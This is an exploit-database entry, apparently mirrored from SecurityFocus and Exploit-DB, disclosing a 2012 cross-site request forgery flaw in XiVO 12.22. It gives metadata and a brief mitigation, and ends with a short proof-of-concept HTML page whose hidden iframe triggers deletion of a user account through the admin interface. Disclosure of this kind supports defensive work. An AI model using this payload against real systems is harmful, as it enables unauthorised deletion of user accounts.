header-logo
Suggest Exploit
vendor:
XiVO
by:
SecurityFocus
7,5
CVSS
HIGH
Cross-Site Request-Forgery
352
CWE
Product Name: XiVO
Affected Version From: XiVO 12.22
Affected Version To: XiVO 12.22
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

XiVO Cross-Site Request-Forgery Vulnerability

XiVO is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Mitigation:

Implementing a secure validation mechanism for all requests is the best way to mitigate this type of attack.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/56652/info

XiVO is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

XiVO 12.22 is vulnerable; other versions may also be affected. 

<html><head><body>
<title>Deleter user ID 2</title>
<iframe src=https://www.example.com/xivo/configuration/index.php/manage/user/?act=delete&id=2&page=1');
</body></head><html>